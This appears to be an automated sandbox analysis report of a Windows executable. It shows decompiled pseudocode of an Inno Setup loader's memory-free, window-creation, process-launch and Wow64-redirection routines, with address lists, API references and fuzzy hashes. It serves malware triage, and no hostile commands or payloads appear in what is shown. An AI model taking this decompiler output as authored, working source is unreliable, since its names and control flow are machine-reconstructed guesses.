				signed int _t113;
				void* _t115;
				void* _t116;

				_t56 = __eax;
				_t89 =  *(__eax - 4);
				_t78 =  *0x4bb059; // 0x0
				if((_t89 & 0x00000007) != 0) {
					__eflags = _t89 & 0x00000005;
					if((_t89 & 0x00000005) != 0) {
						_pop(_t78);
						__eflags = _t89 & 0x00000003;
						if((_t89 & 0x00000003) == 0) {
							_push(_t78);
							_push(__edi);
							_t116 = _t115 + 0xffffffdc;
							_t103 = __eax - 0x10;
							E00403C48();
							_t58 = _t103;
							 *_t116 =  *_t58;
							_v48 =  *((intOrPtr*)(_t58 + 4));
							_t92 =  *(_t58 + 0xc);
							if((_t92 & 0x00000008) != 0) {
								_t79 = _t103;
								_t113 = _t92 & 0xfffffff0;
								_t99 = 0;
								__eflags = 0;
								while(1) {
									VirtualQuery(_t79,  &_v44, 0x1c);
									_t61 = VirtualFree(_t79, 0, 0x8000);
									__eflags = _t61;
									if(_t61 == 0) {
										_t99 = _t99 | 0xffffffff;
										goto L10;
									}
									_t104 = _v44.RegionSize;
									__eflags = _t113 - _t104;
									if(_t113 > _t104) {
										_t113 = _t113 - _t104;
										_t79 = _t79 + _t104;
										continue;
									}
									goto L10;
								}
							} else {
								_t65 = VirtualFree(_t103, 0, 0x8000); // executed
								if(_t65 == 0) {
									_t99 = __edi | 0xffffffff;
								} else {
									_t99 = 0;
								}
							}
							L10:
							if(_t99 == 0) {
								 *_v48 =  *_t116;
								 *( *_t116 + 4) = _v48;
							}
							 *0x4bdb78 = 0;
							return _t99;
						} else {
							return 0xffffffff;
						}
					} else {
						goto L31;
					}
				} else {
					__eflags = __bl;
					__ebx =  *__edx;
					if(__eflags != 0) {
						while(1) {
							__eax = 0x100;
							asm("lock cmpxchg [ebx], ah");
							if(__eflags == 0) {
								goto L14;
							}
							asm("pause");
							__eflags =  *0x4bb989;
							if(__eflags != 0) {
								continue;
							} else {
								Sleep(0);
								__edx = __edx;
								__ecx = __ecx;
								__eax = 0x100;
								asm("lock cmpxchg [ebx], ah");
								if(__eflags != 0) {
									Sleep(0xa);
									__edx = __edx;
									__ecx = __ecx;
									continue;
								}
							}
							goto L14;
						}
					}
					L14:
					_t14 = __edx + 0x14;
					 *_t14 =  *(__edx + 0x14) - 1;
					__eflags =  *_t14;
					__eax =  *(__edx + 0x10);
					if( *_t14 == 0) {
						__eflags = __eax;
						if(__eax == 0) {
							L20:
							 *(__ebx + 0x14) = __eax;
						} else {
							__eax =  *(__edx + 0xc);
							__ecx =  *(__edx + 8);
							 *(__eax + 8) = __ecx;
							 *(__ecx + 0xc) = __eax;
							__eax = 0;
							__eflags =  *((intOrPtr*)(__ebx + 0x18)) - __edx;
							if( *((intOrPtr*)(__ebx + 0x18)) == __edx) {
								goto L20;
							}
						}
						 *__ebx = __al;
						__eax = __edx;
						__edx =  *(__edx - 4);
						__bl =  *0x4bb059; // 0x0
						L31:
						__eflags = _t78;
						_t81 = _t89 & 0xfffffff0;
						_push(_t101);
						_t106 = _t56;
						if(__eflags != 0) {
							while(1) {
								_t67 = 0x100;
								asm("lock cmpxchg [0x4bbae8], ah");
								if(__eflags == 0) {
									goto L32;
								}
								asm("pause");
								__eflags =  *0x4bb989;
								if(__eflags != 0) {
									continue;
								} else {
									Sleep(0);
									_t67 = 0x100;
									asm("lock cmpxchg [0x4bbae8], ah");
									if(__eflags != 0) {
										Sleep(0xa);
										continue;
									}
								}
								goto L32;
							}
						}
						L32:
						__eflags = (_t106 - 4)[_t81] & 0x00000001;
						_t87 = (_t106 - 4)[_t81];
						if(((_t106 - 4)[_t81] & 0x00000001) != 0) {
							_t67 = _t81 + _t106;
							_t88 = _t87 & 0xfffffff0;
							_t81 = _t81 + _t88;
							__eflags = _t88 - 0xb30;
							if(_t88 >= 0xb30) {
								_t67 = E00403AC0(_t67);
							}
						} else {
							_t88 = _t87 | 0x00000008;
							__eflags = _t88;
							(_t106 - 4)[_t81] = _t88;
						}
						__eflags =  *(_t106 - 4) & 0x00000008;
						if(( *(_t106 - 4) & 0x00000008) != 0) {
							_t88 =  *(_t106 - 8);
							_t106 = _t106 - _t88;
							_t81 = _t81 + _t88;
							__eflags = _t88 - 0xb30;
							if(_t88 >= 0xb30) {
								_t67 = E00403AC0(_t106);
							}
						}
						__eflags = _t81 - 0x13ffe0;
						if(_t81 == 0x13ffe0) {
							__eflags =  *0x4bbaf0 - 0x13ffe0;
							if( *0x4bbaf0 != 0x13ffe0) {
								_t82 = _t106 + 0x13ffe0;
								E00403B60(_t67);
								 *((intOrPtr*)(_t82 - 4)) = 2;
								 *0x4bbaf0 = 0x13ffe0;
								 *0x4bbaec = _t82;
								 *0x4bbae8 = 0;
								__eflags = 0;
								return 0;
							} else {
								_t108 = _t106 - 0x10;
								_t70 =  *_t108;
								_t96 =  *(_t108 + 4);
								 *(_t70 + 4) = _t96;
								 *_t96 = _t70;
								 *0x4bbae8 = 0;
								_t71 = VirtualFree(_t108, 0, 0x8000);
								__eflags = _t71 - 1;
								asm("sbb eax, eax");
								return _t71;
							}
						} else {
							 *(_t106 - 4) = _t81 + 3;
							 *(_t106 - 8 + _t81) = _t81;
							E00403B00(_t106, _t88, _t81);
							 *0x4bbae8 = 0;
							__eflags = 0;
							return 0;
						}
					} else {
						__eflags = __eax;
						 *(__edx + 0x10) = __ecx;
						 *(__ecx - 4) = __eax;
						if(__eflags == 0) {
							__ecx =  *(__ebx + 8);
							 *(__edx + 0xc) = __ebx;
							 *(__edx + 8) = __ecx;
							 *(__ecx + 0xc) = __edx;
							 *(__ebx + 8) = __edx;
							 *__ebx = 0;
							__eax = 0;
							__eflags = 0;
							_pop(__ebx);
							return 0;
						} else {
							__eax = 0;
							__eflags = 0;
							 *__ebx = __al;
							_pop(__ebx);
							return 0;
						}
					}
				}
			}





























                                                                                    0x0040426c
                                                                                    0x0040426c
                                                                                    0x00404275
                                                                                    0x0040427b
                                                                                    0x00404364
                                                                                    0x00404367
                                                                                    0x00404454
                                                                                    0x00404455
                                                                                    0x00404458
                                                                                    0x00403cf8
                                                                                    0x00403cfa
                                                                                    0x00403cfc
                                                                                    0x00403d01
                                                                                    0x00403d04
                                                                                    0x00403d09
                                                                                    0x00403d0d
                                                                                    0x00403d13
                                                                                    0x00403d17
                                                                                    0x00403d1d
                                                                                    0x00403d39
                                                                                    0x00403d3d
                                                                                    0x00403d40
                                                                                    0x00403d40
                                                                                    0x00403d42
                                                                                    0x00403d4a
                                                                                    0x00403d57
                                                                                    0x00403d5c
                                                                                    0x00403d5e
                                                                                    0x00403d60
                                                                                    0x00403d63
                                                                                    0x00403d63
                                                                                    0x00403d65
                                                                                    0x00403d69
                                                                                    0x00403d6b
                                                                                    0x00403d6d
                                                                                    0x00403d6f
                                                                                    0x00000000
                                                                                    0x00403d6f
                                                                                    0x00000000
                                                                                    0x00403d6b
                                                                                    0x00403d1f
                                                                                    0x00403d27
                                                                                    0x00403d2e
                                                                                    0x00403d34
                                                                                    0x00403d30
                                                                                    0x00403d30
                                                                                    0x00403d30
                                                                                    0x00403d2e
                                                                                    0x00403d73
                                                                                    0x00403d75
                                                                                    0x00403d7e
                                                                                    0x00403d87
                                                                                    0x00403d87
                                                                                    0x00403d8a
                                                                                    0x00403d9a
                                                                                    0x0040445e
                                                                                    0x00404463
                                                                                    0x00404463
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00404281
                                                                                    0x00404281
                                                                                    0x00404283
                                                                                    0x00404285
                                                                                    0x004042e8
                                                                                    0x004042e8
                                                                                    0x004042ed
                                                                                    0x004042f1
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004042f3
                                                                                    0x004042f5
                                                                                    0x004042fc
                                                                                    0x00000000
                                                                                    0x004042fe
                                                                                    0x00404302
                                                                                    0x00404307
                                                                                    0x00404308
                                                                                    0x00404309
                                                                                    0x0040430e
                                                                                    0x00404312
                                                                                    0x0040431c
                                                                                    0x00404321
                                                                                    0x00404322
                                                                                    0x00000000
                                                                                    0x00404322
                                                                                    0x00404312
                                                                                    0x00000000
                                                                                    0x004042fc
                                                                                    0x004042e8
                                                                                    0x00404287
                                                                                    0x00404287
                                                                                    0x00404287
                                                                                    0x00404287
                                                                                    0x0040428b
                                                                                    0x0040428e
                                                                                    0x004042bc
                                                                                    0x004042be
                                                                                    0x004042d3
                                                                                    0x004042d3
                                                                                    0x004042c0
                                                                                    0x004042c0
                                                                                    0x004042c3
                                                                                    0x004042c6
                                                                                    0x004042c9
                                                                                    0x004042cc
                                                                                    0x004042ce
                                                                                    0x004042d1
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004042d1
                                                                                    0x004042d6
                                                                                    0x004042d8
                                                                                    0x004042da
                                                                                    0x004042dd
                                                                                    0x0040436d
                                                                                    0x00404370
                                                                                    0x00404372
                                                                                    0x00404374
                                                                                    0x00404375
                                                                                    0x00404377
                                                                                    0x00404328
                                                                                    0x00404328
                                                                                    0x0040432d
                                                                                    0x00404335
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00404337
                                                                                    0x00404339
                                                                                    0x00404340
                                                                                    0x00000000
                                                                                    0x00404342
                                                                                    0x00404344
                                                                                    0x00404349
                                                                                    0x0040434e
                                                                                    0x00404356
                                                                                    0x0040435a
                                                                                    0x00000000
                                                                                    0x0040435a
                                                                                    0x00404356
                                                                                    0x00000000
                                                                                    0x00404340
                                                                                    0x00404328
                                                                                    0x00404379
                                                                                    0x00404379
                                                                                    0x00404381
                                                                                    0x00404385
                                                                                    0x004043bc
                                                                                    0x004043bf
                                                                                    0x004043c2
                                                                                    0x004043c4
                                                                                    0x004043ca
                                                                                    0x004043cc
                                                                                    0x004043cc
                                                                                    0x00404387
                                                                                    0x00404387
                                                                                    0x00404387
                                                                                    0x0040438a
                                                                                    0x0040438a
                                                                                    0x0040438e
                                                                                    0x00404392
                                                                                    0x004043d4
                                                                                    0x004043d7
                                                                                    0x004043d9
                                                                                    0x004043db
                                                                                    0x004043e1
                                                                                    0x004043e5
                                                                                    0x004043e5
                                                                                    0x004043e1
                                                                                    0x00404394
                                                                                    0x0040439a
                                                                                    0x004043ec
                                                                                    0x004043f6
                                                                                    0x00404424
                                                                                    0x0040442a
                                                                                    0x0040442f
                                                                                    0x00404436
                                                                                    0x00404440
                                                                                    0x00404446
                                                                                    0x0040444d
                                                                                    0x00404451
                                                                                    0x004043f8
                                                                                    0x004043f8
                                                                                    0x004043fb
                                                                                    0x004043fd
                                                                                    0x00404400
                                                                                    0x00404403
                                                                                    0x00404405
                                                                                    0x00404414
                                                                                    0x00404419
                                                                                    0x0040441c
                                                                                    0x00404420
                                                                                    0x00404420
                                                                                    0x0040439c
                                                                                    0x0040439f
                                                                                    0x004043a2
                                                                                    0x004043aa
                                                                                    0x004043af
                                                                                    0x004043b6
                                                                                    0x004043ba
                                                                                    0x004043ba
                                                                                    0x00404290
                                                                                    0x00404290
                                                                                    0x00404292
                                                                                    0x00404298
                                                                                    0x0040429b
                                                                                    0x004042a4
                                                                                    0x004042a7
                                                                                    0x004042aa
                                                                                    0x004042ad
                                                                                    0x004042b0
                                                                                    0x004042b3
                                                                                    0x004042b6
                                                                                    0x004042b6
                                                                                    0x004042b8
                                                                                    0x004042b9
                                                                                    0x0040429d
                                                                                    0x0040429d
                                                                                    0x0040429d
                                                                                    0x0040429f
                                                                                    0x004042a1
                                                                                    0x004042a2
                                                                                    0x004042a2
                                                                                    0x0040429b
                                                                                    0x0040428e

                                                                                    APIs
                                                                                    • Sleep.KERNEL32(00000000,?,?,00000000,0040BB40,0040BBA6,?,00000000,?,?,0040BEC9,00000000,?,00000000,0040C3CA,00000000), ref: 00404302
                                                                                    • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,0040BB40,0040BBA6,?,00000000,?,?,0040BEC9,00000000,?,00000000,0040C3CA), ref: 0040431C
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Sleep
                                                                                    • String ID:
                                                                                    • API String ID: 3472027048-0
                                                                                    • Opcode ID: bb44cecb062a42ab294f9ebbddb74143d6ecf503913ace061e42b720e5e9e313
                                                                                    • Instruction ID: daf3465a9571387f72e828d046180f4ce70f3b260d456b91f151aa63c4646fa2
                                                                                    • Opcode Fuzzy Hash: bb44cecb062a42ab294f9ebbddb74143d6ecf503913ace061e42b720e5e9e313
                                                                                    • Instruction Fuzzy Hash: AA71E2B17042008BD715DF29CC84B16BBD8AF85715F2482BFE984AB3D2D7B899418789
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004B63A1, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 103COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 85%
                                                                                    			E004B63A1(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				intOrPtr _t17;
				struct HWND__* _t21;
				struct HWND__* _t22;
				struct HWND__* _t25;
				intOrPtr _t26;
				intOrPtr _t28;
				intOrPtr _t36;
				intOrPtr _t39;
				int _t40;
				intOrPtr _t41;
				intOrPtr _t43;
				struct HWND__* _t46;
				intOrPtr _t47;
				intOrPtr _t50;
				intOrPtr _t60;
				intOrPtr _t62;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t70;
				void* _t73;
				void* _t74;

				_t74 = __eflags;
				_t72 = __esi;
				_t71 = __edi;
				_t52 = __ebx;
				_pop(_t62);
				 *[fs:eax] = _t62;
				_t17 =  *0x4c1d88; // 0x0
				 *0x4c1d88 = 0;
				E00405CE8(_t17);
				_t21 = E0040E450(0, L"STATIC", 0,  *0x4be634, 0, 0, 0, 0, 0, 0, 0); // executed
				 *0x4ba450 = _t21;
				_t22 =  *0x4ba450; // 0x9025c
				 *0x4c1d80 = SetWindowLongW(_t22, 0xfffffffc, E004AF69C);
				_t25 =  *0x4ba450; // 0x9025c
				 *(_t73 - 0x58) = _t25;
				 *((char*)(_t73 - 0x54)) = 0;
				_t26 =  *0x4c1d90; // 0x4ca924
				_t4 = _t26 + 0x20; // 0x6145a8
				 *((intOrPtr*)(_t73 - 0x50)) =  *_t4;
				 *((char*)(_t73 - 0x4c)) = 0;
				_t28 =  *0x4c1d90; // 0x4ca924
				_t7 = _t28 + 0x24; // 0xbea00
				 *((intOrPtr*)(_t73 - 0x48)) =  *_t7;
				 *((char*)(_t73 - 0x44)) = 0;
				E0041A87C(L"/SL5=\"$%x,%d,%d,", 2, _t73 - 0x58, _t73 - 0x40);
				_push( *((intOrPtr*)(_t73 - 0x40)));
				_push( *0x4c1d84);
				_push(0x4b6680);
				E00422BC4(_t73 - 0x5c, __ebx, __esi, _t74);
				_push( *((intOrPtr*)(_t73 - 0x5c)));
				E004087C4(_t73 - 0x3c, __ebx, 4, __edi, __esi);
				_t36 =  *0x4c1d9c; // 0x0, executed
				E004AF728(_t36, _t52, 0x4ba44c,  *((intOrPtr*)(_t73 - 0x3c)), _t71, _t72, __fp0); // executed
				if( *0x4ba448 != 0xffffffff) {
					_t50 =  *0x4ba448; // 0x0
					E004AF60C(_t50);
				}
				_pop(_t68);
				 *[fs:eax] = _t68;
				_push(E004B6554);
				_t39 =  *0x4c1d88; // 0x0
				_t40 = E00405CE8(_t39);
				if( *0x4c1d9c != 0) {
					_t70 =  *0x4c1d9c; // 0x0
					_t40 = E004AF1B4(0, _t70, 0xfa, 0x32); // executed
				}
				if( *0x4c1d94 != 0) {
					_t47 =  *0x4c1d94; // 0x0
					_t40 = RemoveDirectoryW(E004084EC(_t47)); // executed
				}
				if( *0x4ba450 != 0) {
					_t46 =  *0x4ba450; // 0x9025c
					_t40 = DestroyWindow(_t46); // executed
				}
				if( *0x4c1d78 != 0) {
					_t41 =  *0x4c1d78; // 0x0
					_t60 =  *0x4c1d7c; // 0x1
					_t69 =  *0x426bb0; // 0x426bb4
					E00408D08(_t41, _t60, _t69);
					_t43 =  *0x4c1d78; // 0x0
					E0040540C(_t43);
					 *0x4c1d78 = 0;
					return 0;
				}
				return _t40;
			}
























                                                                                    0x004b63a1
                                                                                    0x004b63a1
                                                                                    0x004b63a1
                                                                                    0x004b63a1
                                                                                    0x004b63a3
                                                                                    0x004b63a6
                                                                                    0x004b63d3
                                                                                    0x004b63da
                                                                                    0x004b63e0
                                                                                    0x004b6407
                                                                                    0x004b640c
                                                                                    0x004b6418
                                                                                    0x004b6423
                                                                                    0x004b642c
                                                                                    0x004b6431
                                                                                    0x004b6434
                                                                                    0x004b6438
                                                                                    0x004b643d
                                                                                    0x004b6440
                                                                                    0x004b6443
                                                                                    0x004b6447
                                                                                    0x004b644c
                                                                                    0x004b644f
                                                                                    0x004b6452
                                                                                    0x004b6463
                                                                                    0x004b6468
                                                                                    0x004b646b
                                                                                    0x004b6471
                                                                                    0x004b6479
                                                                                    0x004b647e
                                                                                    0x004b6489
                                                                                    0x004b6496
                                                                                    0x004b649b
                                                                                    0x004b64a7
                                                                                    0x004b64a9
                                                                                    0x004b64ae
                                                                                    0x004b64ae
                                                                                    0x004b64b5
                                                                                    0x004b64b8
                                                                                    0x004b64bb
                                                                                    0x004b64c0
                                                                                    0x004b64c5
                                                                                    0x004b64d1
                                                                                    0x004b64df
                                                                                    0x004b64e7
                                                                                    0x004b64e7
                                                                                    0x004b64f3
                                                                                    0x004b64f5
                                                                                    0x004b6500
                                                                                    0x004b6500
                                                                                    0x004b650c
                                                                                    0x004b650e
                                                                                    0x004b6514
                                                                                    0x004b6514
                                                                                    0x004b6520
                                                                                    0x004b6522
                                                                                    0x004b6527
                                                                                    0x004b652d
                                                                                    0x004b6533
                                                                                    0x004b6538
                                                                                    0x004b653d
                                                                                    0x004b6544
                                                                                    0x00000000
                                                                                    0x004b6544
                                                                                    0x004b6549

                                                                                    APIs
                                                                                      • Part of subcall function 0040E450: CreateWindowExW.USER32 ref: 0040E48F
                                                                                    • SetWindowLongW.USER32 ref: 004B641E
                                                                                      • Part of subcall function 00422BC4: GetCommandLineW.KERNEL32(00000000,00422C06,?,?,00000000,?,004B647E,004B6680,?), ref: 00422BDA
                                                                                      • Part of subcall function 004AF728: CreateProcessW.KERNEL32 ref: 004AF798
                                                                                      • Part of subcall function 004AF728: CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,004AF82C,00000000,004AF81C,00000000), ref: 004AF7AE
                                                                                      • Part of subcall function 004AF728: MsgWaitForMultipleObjects.USER32 ref: 004AF7C7
                                                                                      • Part of subcall function 004AF728: GetExitCodeProcess.KERNEL32 ref: 004AF7DB
                                                                                      • Part of subcall function 004AF728: CloseHandle.KERNEL32(?,?,004BA44C,00000001,?,00000000,000000FF,000004FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004AF7E4
                                                                                    • RemoveDirectoryW.KERNEL32(00000000,004B6554), ref: 004B6500
                                                                                    • DestroyWindow.USER32(0009025C,004B6554), ref: 004B6514
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Window$CloseCreateHandleProcess$CodeCommandDestroyDirectoryExitLineLongMultipleObjectsRemoveWait
                                                                                    • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                                    • API String ID: 3586484885-3001827809
                                                                                    • Opcode ID: 3c021837c984efc67f9ad3a794955b0d04b23bc85077f6812c73bb0a86195aee
                                                                                    • Instruction ID: 04c90e22d0408fd8de4b79ff2beaee59f7a3a861a1d73b16261182ae62401715
                                                                                    • Opcode Fuzzy Hash: 3c021837c984efc67f9ad3a794955b0d04b23bc85077f6812c73bb0a86195aee
                                                                                    • Instruction Fuzzy Hash: EC416B74A002009FE754EBA9EC85B9A37B4EB85308F11453BE0059B2B6CB7CA851CB5D
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004AF728, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 77processCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 61%
                                                                                    			E004AF728(void* __eax, void* __ebx, DWORD* __ecx, void* __edx, void* __edi, void* __esi, void* __fp0) {
				char _v8;
				struct _STARTUPINFOW _v76;
				void* _v88;
				void* _v92;
				int _t23;
				intOrPtr _t49;
				DWORD* _t51;
				void* _t56;

				_v8 = 0;
				_t51 = __ecx;
				_t53 = __edx;
				_t41 = __eax;
				_push(_t56);
				_push(0x4af7ff);
				_push( *[fs:eax]);
				 *[fs:eax] = _t56 + 0xffffffa8;
				_push(0x4af81c);
				_push(__eax);
				_push(0x4af82c);
				_push(__edx);
				E004087C4( &_v8, __eax, 4, __ecx, __edx);
				E00405884( &_v76, 0x44);
				_v76.cb = 0x44;
				_t23 = CreateProcessW(0, E004084EC(_v8), 0, 0, 0, 0, 0, 0,  &_v76,  &_v92); // executed
				_t58 = _t23;
				if(_t23 == 0) {
					E004AF34C(0x83, _t41, 0, _t53, _t58);
				}
				CloseHandle(_v88);
				do {
					E004AF6FC();
				} while (MsgWaitForMultipleObjects(1,  &_v92, 0, 0xffffffff, 0x4ff) == 1);
				E004AF6FC();
				GetExitCodeProcess(_v92, _t51); // executed
				CloseHandle(_v92);
				_pop(_t49);
				 *[fs:eax] = _t49;
				_push(0x4af806);
				return E00407A20( &_v8);
			}











                                                                                    0x004af733
                                                                                    0x004af736
                                                                                    0x004af738
                                                                                    0x004af73a
                                                                                    0x004af73e
                                                                                    0x004af73f
                                                                                    0x004af744
                                                                                    0x004af747
                                                                                    0x004af74a
                                                                                    0x004af74f
                                                                                    0x004af750
                                                                                    0x004af755
                                                                                    0x004af75e
                                                                                    0x004af76d
                                                                                    0x004af772
                                                                                    0x004af798
                                                                                    0x004af79d
                                                                                    0x004af79f
                                                                                    0x004af7a5
                                                                                    0x004af7a5
                                                                                    0x004af7ae
                                                                                    0x004af7b3
                                                                                    0x004af7b3
                                                                                    0x004af7cc
                                                                                    0x004af7d1
                                                                                    0x004af7db
                                                                                    0x004af7e4
                                                                                    0x004af7eb
                                                                                    0x004af7ee
                                                                                    0x004af7f1
                                                                                    0x004af7fe

                                                                                    APIs
                                                                                    • CreateProcessW.KERNEL32 ref: 004AF798
                                                                                    • CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,004AF82C,00000000,004AF81C,00000000), ref: 004AF7AE
                                                                                    • MsgWaitForMultipleObjects.USER32 ref: 004AF7C7
                                                                                    • GetExitCodeProcess.KERNEL32 ref: 004AF7DB
                                                                                    • CloseHandle.KERNEL32(?,?,004BA44C,00000001,?,00000000,000000FF,000004FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004AF7E4
                                                                                      • Part of subcall function 004AF34C: GetLastError.KERNEL32(00000000,004AF3F5,?,?,00000000), ref: 004AF36F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: CloseHandleProcess$CodeCreateErrorExitLastMultipleObjectsWait
                                                                                    • String ID: D
                                                                                    • API String ID: 3356880605-2746444292
                                                                                    • Opcode ID: ad1163668f60b09aa263e635df1463f1e4b37e8a5aa9c4cbf2e159c77cef0046
                                                                                    • Instruction ID: 88989adc3f1fa39a5a5eb6990527994e2deb527bcdcae90bffb7d35c0d41af56
                                                                                    • Opcode Fuzzy Hash: ad1163668f60b09aa263e635df1463f1e4b37e8a5aa9c4cbf2e159c77cef0046
                                                                                    • Instruction Fuzzy Hash: C01163716041096EEB00FBE68C42F9F77ACDF56714F50053AB604E72C5DA789905866D
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004B5A90, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 56COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 60%
                                                                                    			E004B5A90(void* __ebx, void* __ecx, void* __edx, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _t16;
				intOrPtr _t32;
				intOrPtr _t41;

				_t27 = __ebx;
				_push(0);
				_push(0);
				_push(0);
				_push(_t41);
				_push(0x4b5b5a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t41;
				 *0x4c1124 =  *0x4c1124 - 1;
				if( *0x4c1124 < 0) {
					 *0x4c1128 = E0040E1A8(__ebx, __esi, GetModuleHandleW(L"kernel32.dll"), L"Wow64DisableWow64FsRedirection");
					 *0x4c112c = E0040E1A8(__ebx, __esi, GetModuleHandleW(L"kernel32.dll"), L"Wow64RevertWow64FsRedirection");
					if( *0x4c1128 == 0 ||  *0x4c112c == 0) {
						_t16 = 0;
					} else {
						_t16 = 1;
					}
					 *0x4c1130 = _t16;
					E00422D44( &_v12);
					E00422660(_v12,  &_v8);
					E004086E4( &_v8, L"shell32.dll");
					E00421230(_v8, _t27, 0x8000); // executed
					E004232EC(0x4c783afb,  &_v16);
				}
				_pop(_t32);
				 *[fs:eax] = _t32;
				_push(0x4b5b61);
				return E00407A80( &_v16, 3);
			}









                                                                                    0x004b5a90
                                                                                    0x004b5a93
                                                                                    0x004b5a95
                                                                                    0x004b5a97
                                                                                    0x004b5a9b
                                                                                    0x004b5a9c
                                                                                    0x004b5aa1
                                                                                    0x004b5aa4
                                                                                    0x004b5aa7
                                                                                    0x004b5aae
                                                                                    0x004b5ac9
                                                                                    0x004b5ae3
                                                                                    0x004b5aef
                                                                                    0x004b5afa
                                                                                    0x004b5afe
                                                                                    0x004b5afe
                                                                                    0x004b5afe
                                                                                    0x004b5b00
                                                                                    0x004b5b08
                                                                                    0x004b5b13
                                                                                    0x004b5b20
                                                                                    0x004b5b2d
                                                                                    0x004b5b3a
                                                                                    0x004b5b3a
                                                                                    0x004b5b41
                                                                                    0x004b5b44
                                                                                    0x004b5b47
                                                                                    0x004b5b59

                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004B5B5A,?,00000000,00000000,00000000), ref: 004B5ABE
                                                                                      • Part of subcall function 0040E1A8: GetProcAddress.KERNEL32(?,00423116), ref: 0040E1D2
                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004B5B5A,?,00000000,00000000,00000000), ref: 004B5AD8
                                                                                      • Part of subcall function 0040E1A8: GetProcAddress.KERNEL32(?,00000000), ref: 0040E20B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: AddressHandleModuleProc
                                                                                    • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                                    • API String ID: 1646373207-2130885113
                                                                                    • Opcode ID: 149d4641e6716bccfc7038b8b83dc43c2c59674e16c2d4af6eff100d23c955b7
                                                                                    • Instruction ID: b56c6da1e02aeac4ac36a9fb763b3b3a2bfa4c382daca5c5ea2a5d16c2919690
                                                                                    • Opcode Fuzzy Hash: 149d4641e6716bccfc7038b8b83dc43c2c59674e16c2d4af6eff100d23c955b7
                                                                                    • Instruction Fuzzy Hash: DA11A730604704AFD744EB76DC02F9DB7B4E749704F64447BF500A6591CABC6A04CA3D
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00403EE8, Relevance: 9.0, APIs: 7, Instructions: 298sleepCOMMON
                                                                                    Download Yara Rule
